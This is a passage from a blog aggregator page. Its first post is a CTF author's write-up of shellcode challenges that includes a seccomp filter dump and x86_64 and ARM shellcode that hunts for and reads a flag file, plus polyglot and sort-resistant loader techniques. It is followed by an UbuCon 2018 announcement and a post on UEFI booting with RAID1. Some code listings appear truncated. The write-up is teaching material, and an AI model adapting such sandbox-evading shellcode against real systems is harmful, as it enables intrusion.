desired string and still pass the same pointer.

Reverse Engineering the Sandbox

There’s a wonderful toolset called
seccomp-tools that provides the
ability to dump the BPF structure from the process as it runs by using
ptrace(). If we run the Intel coder binary under seccomp-tools, we’ll see
the following structure:

0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x11 0xc000003e if (A != ARCH_X86_64) goto 0019
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x0f 0x00 0x40000000 if (A >= 0x40000000) goto 0019
0004: 0x15 0x0d 0x00 0x00000003 if (A == close) goto 0018
0005: 0x15 0x0c 0x00 0x0000000f if (A == rt_sigreturn) goto 0018
0006: 0x15 0x0b 0x00 0x00000028 if (A == sendfile) goto 0018
0007: 0x15 0x0a 0x00 0x0000003c if (A == exit) goto 0018
0008: 0x15 0x09 0x00 0x000000e7 if (A == exit_group) goto 0018
0009: 0x15 0x00 0x09 0x00000002 if (A != open) goto 0019
0010: 0x20 0x00 0x00 0x00000014 A = args[0] >> 32
0011: 0x15 0x00 0x07 0x00005647 if (A != 0x5647) goto 0019
0012: 0x20 0x00 0x00 0x00000010 A = args[0]
0013: 0x15 0x00 0x05 0x8bd01428 if (A != 0x8bd01428) goto 0019
0014: 0x20 0x00 0x00 0x0000001c A = args[1] >> 32
0015: 0x15 0x00 0x03 0x00000000 if (A != 0x0) goto 0019
0016: 0x20 0x00 0x00 0x00000018 A = args[1]
0017: 0x15 0x00 0x01 0x00000000 if (A != 0x0) goto 0019
0018: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0019: 0x06 0x00 0x00 0x00000000 return KILL

The first two lines check the architecture of the running binary (presumably
because the system call numbers are architecture-dependent). The filter then
loads the system call number to determine the behavior for each syscall. Lines
0004 through 0008 are syscalls that are allowed unconditionally. Line 0009
ensures that anything but the already-allowed syscalls or open() results in
killing the process.

Lines 0010-0017 check the arguments passed to open(). Since the BPF can only
compare 32 bits at a time, the 64-bit registers are split in two with shifts.
The first few lines ensure that the filename string (args[0]) is a pointer
with value 0x56478bd01428. Of course, due to ASLR, you’ll find that this
value varies with each execution of the program, so no hard coding your pointer
values here! Finally, it checks that the second argument (args[1]) to
open() is 0x0, which corresponds to O_RDONLY. (No opening the flag for

seccomp-tools really makes this so much easier than manual reversing would be.

Solving Intel & ARM Coder

The solutions for both Intel Coder and ARM Coder are very similar. First, let’s
determine the steps we need to undertake:

Locate fhe ./flag.txt string that was used in the seccomp-bpf filter.
Open ./flag.txt.
Read the file and send the contents to the player. (sendfile() on Intel,
read() and write() on ARM)

In order to not be a total jerk in these challenges, I ensured that one of the
registers contained a value somewhere in the .text section of the binary, to
make it somewhat easier to hunt for the ./flag.txt string. (This was actually
always the address of the function that executed the player shellcode.)
Consequently, finding the string should have been trivial using the commonly
known egghunter techniques.

At this point, it’s basically just a straightforward shellcode to open() the
file and send its contents. The entirety of my example solution for Intel Coder


; hunt for string based on rdx
add rdx, 0x4
mov rax, 0x742e67616c662f2e ; ./flag.t
cmp rax, [rdx]
jne hunt

xor rax, rax
mov rdi, rdx ; path
xor rax, rax
mov al, 2 ; rax for SYS_open
xor rdx, rdx ; mode
xor rsi, rsi ; flags

xor rdi, rdi
inc rdi ; out_fd
mov rsi, rax ; in_fd from open
xor rdx, rdx ; offset
mov r10, 0xFF ; count
mov rax, 40 ; SYS_sendfile

xor rax, rax
mov al, 60 ; SYS_exit
xor rdi, rdi ; code

For ARM coder, the solution is much the same, except using read() and
write() instead of sendfile().

.section .text
.global shellcode

# r0 = my shellcode
# r1 = new stack
# r2 = some pointer

# load ./fl into r3
MOVW r3, #0x2f2e
MOVT r3, #0x6c66
# load ag.t into r4
MOVW r4, #0x6761
MOVT r4, #0x742e
LDR r5, [r2, #0x4]!
TEQ r5, r3
BNE hunt
LDR r5, [r2, #0x4]
TEQ r5, r4
BNE hunt
# r2 should now have the address of ./flag.txt

# SYS_open
MOVW r7, #5
MOV r0, r2
MOVW r1, #0
MOVW r2, #0
SWI #0

# SYS_read
MOVW r7, #3
MOV r1, sp
MOV r2, #0xFF
SWI #0

# SYS_write
MOVW r7, #4
MOV r2, r0
MOV r1, sp
MOVW r0, #1
SWI #0

# SYS_exit
MOVW r7, #1
MOVW r0, #0
SWI #0

Poly Coder

Poly Coder was actually not very difficult if you had solved both of the above
challenges. It required only reading from an already open FD and writing to an
already open FD. You did have to search through the FDs to find which were
open, but this was easy as any that were not would return -1, so looping until
an amount greater than 0 was read/written was all that was required.

To produce shellcode that ran on both architectures, you could use an
instruction that was a jump in one architecture and benign in the other. One
such example is EB 7F 00 32, which is a jmp 0x7F in x86_64, but does some
AND operation on r0 in ARM. Prefixing your shellcode with that, followed by
up to 120 bytes of ARM shellcode, then a few bytes of padding, and the x86_64
shellcode at the end would work.

OCD Coder

As I recall it, one of the other members of our CTF organizing team joked “we
should sort their shellcode before we run it.” While intended as a joke, I took
this as a challenge and began work to see if this was solvable. Obviously, the
smaller the granularity (e.g., sorting by byte) the more difficult this becomes.
I settled on trying to find a solution where it was sorted by 32-bit (DWORD)
chunks, and found one with about 2 hours of effort.

Rather than try to write the entire shellcode in something that would sort
correctly, I wrote a small loader that was manually tweaked to sort. This
loader would then take the following shellcode and extract the lower 3 bytes of
each DWORD and concatenate them. In this way, I could force ordering by
inserting a one-byte tag at the most significant position of each 3 byte chunk.

It looks something like this:

[tag][3 bytes shellcode]
[tag][3 bytes shellcode]
[tag][3 bytes shellcode]


[3 bytes shellcode][3 by
tes shellcode][3 bytes s

The loader is as simple as this:


# assumes shellcode @eax
mov ecx, 0x24
and eax, eax
add eax, ecx
mov ebx, eax
inc edx
mov edx, [eax]
add eax, 4
mov [ebx], edx
inc ebx
inc ebx
inc ebx
dec ecx
jnz loop

The large number of nops was necessary to get the loader to sort properly, as
were tricks like using 3 inc ebx instructions instead of add ebx, 3.
There’s even trash instructions like inc edx that have no affect on the
output, but serve just to get the shellcode to sort the way I needed. The x86
opcode reference was incredibly useful in
finding bytes with the desired value to make things work.

I have no doubt there are shorter or more efficient solutions, but this got the
job done.


We’ll soon be releasing the source code to all of the challenges, so you can see
the details of how this was all put together, but I wanted to share my insight
into the challenges from the author’s point of view. Hopefully those that did
solve it (or tried to solve it) had a good time doing so or learned something

3 days ago

Costales: UbuCon Europe 2018 | 1 Week to go!! from Planet Ubuntu

Yes! Everything is ready for the incoming UbuCon Europe 2018 in Xixón! 😃We'll have an awesome weekend of conferences (with 4 parallel talks), podcasts, stands, social events... Most of them are in English, but there will be in Spanish & Asturian too.\o/The speakers are coming from all these countries:\o/Are you ready for an incredible UbuCon? :)Testing the Main Room #noeditsRemember that you have transport discounts and a main social event: the espicha.See you in Xixón! ❤ + info

3 days ago

Kees Cook: UEFI booting and RAID1 from Planet Ubuntu

I spent some time yesterday building out a UEFI server that didn’t have on-board hardware RAID for its system drives. In these situations, I always use Linux’s md RAID1 for the root filesystem (and/or /boot). This worked well for BIOS booting since BIOS just transfers control blindly to the MBR of whatever disk it sees (modulo finding a “bootable partition” flag, etc, etc). This means that BIOS doesn’t really care what’s on the drive, it’ll hand over control to the GRUB code in the MBR.
With UEFI, the boot firmware is actually examining the GPT partition table, looking for the partition marked with the “EFI System Partition” (ESP) UUID. Then it looks for a FAT32 filesystem there, and does more things like looking at NVRAM boot entries, or just running BOOT/EFI/BOOTX64.EFI from the FAT32. Under Linux, this .EFI code is either GRUB itself, or Shim which loads GRUB.
So, if I want RAID1 for my root filesystem, that’s fine (GRUB will read md, LVM, etc), but how do I handle /boot/efi (the UEFI ESP)? In everything I found answering this question, the answer was “oh, just manually make an ESP on each drive in your RAID and copy the files around, add a separate NVRAM entry (with efibootmgr) for each drive, and you’re fine!” I did not like this one bit since it meant things could get out of sync between the copies, etc.
The current implementation of Linux’s md RAID puts metadata at the front of a partition. This solves more problems than it creates, but it means the RAID isn’t “invisible” to something that doesn’t know about the metadata. In fact, mdadm warns about this pretty loudly:
# mdadm --create /dev/md0 --level 1 --raid-disks 2 /dev/sda1 /dev/sdb1
mdadm: Note: this array has metadata at the start and
may not be suitable as a boot device. If you plan to
store '/boot' on this device please ensure that
your boot-loader understands md/v1.x metadata, or use

Reading from the mdadm man page:
-e, --metadata=
1, 1.0, 1.1, 1.2 default
Use the new version-1 format superblock. This has fewer
restrictions. It can easily be moved between hosts with
different endian-ness, and a recovery operation can be
checkpointed and restarted. The different sub-versions
store the superblock at different locations on the
device, either at the end (for 1.0), at the start (for
1.1) or 4K from the start (for 1.2). "1" is equivalent
to "1.2" (the commonly preferred 1.x format). "default"
is equivalent to "1.2".

First we toss a FAT32 on the RAID (mkfs.fat -F32 /dev/md0), and looking at the results, the first 4K is entirely zeros, and file doesn’t see a filesystem:
# dd if=/dev/sda1 bs=1K count=5 status=none | hexdump -C
00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00001000 fc 4e 2b a9 01 00 00 00 00 00 00 00 00 00 00 00 |.N+.............|
# file -s /dev/sda1
/dev/sda1: Linux Software RAID version 1.2 ...

So, instead, we’ll use --metadata 1.0 to put the RAID metadata at the end:
# mdadm --create /dev/md0 --level 1 --raid-disks 2 --metadata 1.0 /dev/sda1 /dev/sdb1
# mkfs.fat -F32 /dev/md0
# dd if=/dev/sda1 bs=1 skip=80 count=16 status=none | xxd
00000000: 2020 4641 5433 3220 2020 0e1f be77 7cac FAT32 ...w|.
# file -s /dev/sda1
/dev/sda1: ... FAT (32 bit)

Now we have a visible FAT32 filesystem on the ESP. UEFI should be able to boot whatever disk hasn’t failed, and grub-install will write to the RAID mounted at /boot/efi.
However, we’re left with a new problem: on (at least) Debian and Ubuntu, grub-install attempts to run efibootmgr to record which disk UEFI should boot from. This fails, though, since it expects a single disk, not a RAID set. In fact, it returns nothing, and tries to run efibootmgr with an empty -d argument:
Installing for x86_64-efi platform.
efibootmgr: option requires an argument -- 'd'
grub-install: error: efibootmgr failed to register the boot entry: Operation not permitted.
Failed: grub-install --target=x86_64-efi
WARNING: Bootloader is not properly installed, system may not be bootable

Luckily my UEFI boots without NVRAM entries, and I can disable the NVRAM writing via the “Update NVRAM variables to automatically boot into Debian?” debconf prompt when running: dpkg-reconfigure -p low grub-efi-amd64
So, now my system will boot with both or either drive present, and updates from Linux to /boot/efi are visible on all RAID members at boot-time. HOWEVER there is one nasty risk with this setup: if UEFI writes anything to one of the drives (which this firmware did when it wrote out a “boot variable cache” file), it may lead to corrupted results once Linux mounts the RAID (since the member drives won’t have identical block-level copies of the FAT32 any more).
To deal with this “external write” situation, I see some solutions:

Make the partition read-only when not under Linux. (I don’t think this is a thing.)
Create higher-level knowledge of the root-filesystem RAID configuration is needed to keep a collection of filesystems manually synchronized instead of doing block-level RAID. (Seems like a lot of work and would need redesign of /boot/efi into something like /boot/efi/booted, /boot/efi/spare1, /boot/efi/spare2, etc)
Prefer one RAID member’s copy of /boot/efi and rebuild the RAID at every boot. If there were no external writes, there’s no issue. (Though what’s really the right way to pick the copy to prefer?)

Since mdadm has the “--update=resync” assembly option, I can actually do the latter option. This required updating /etc/mdadm/mdadm.conf to add <ignore> on the RAID’s ARRAY line to keep it from auto-starting:
ARRAY <ignore> metadata=1.0 UUID=123...

(Since it’s ignored, I’ve chosen /dev/md100 for the manual assembly below.) Then I added the noauto option to the /boot/efi entry in /etc/fstab:
/dev/md100 /boot/efi vfat noauto,defaults 0 0

And finally I added a systemd oneshot service that assembles the RAID with resync and mounts it:
Description=Resync /boot/efi RAID

ExecStart=/sbin/mdadm -A /dev/md100 --uuid=123... --update=resync
ExecStart=/bin/mount /boot/efi


(And don’t forget to run “update-initramfs -u” so the initramfs has an updated copy of /dev/mdadm/mdadm.conf.)
If mdadm.conf supported an “update=” option for ARRAY lines, this would have been trivial. Looking at the source, though, that kind of change doesn’t look easy. I can dream!
And if I wanted to keep a “pristine” version of /boot/efi that UEFI couldn’t update I could rearrange things more dramatically to keep the primary RAID member as a loopback device on a file in the root filesystem (e.g. /boot/efi.img). This would make all external changes in the real ESPs disappear after resync. Something like:

# truncate --size 512M /boot/efi.img
# losetup -f --show /boot/efi.img
# mdadm --create /dev/md100 --level 1 --raid-disks 3 --metadata 1.0 /dev/loop0 /dev/sda1 /dev/sdb1

And at boot just rebuild it from /dev/loop0, though I’m not sure how to “prefer” that partition…
© 2018, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

4 days ago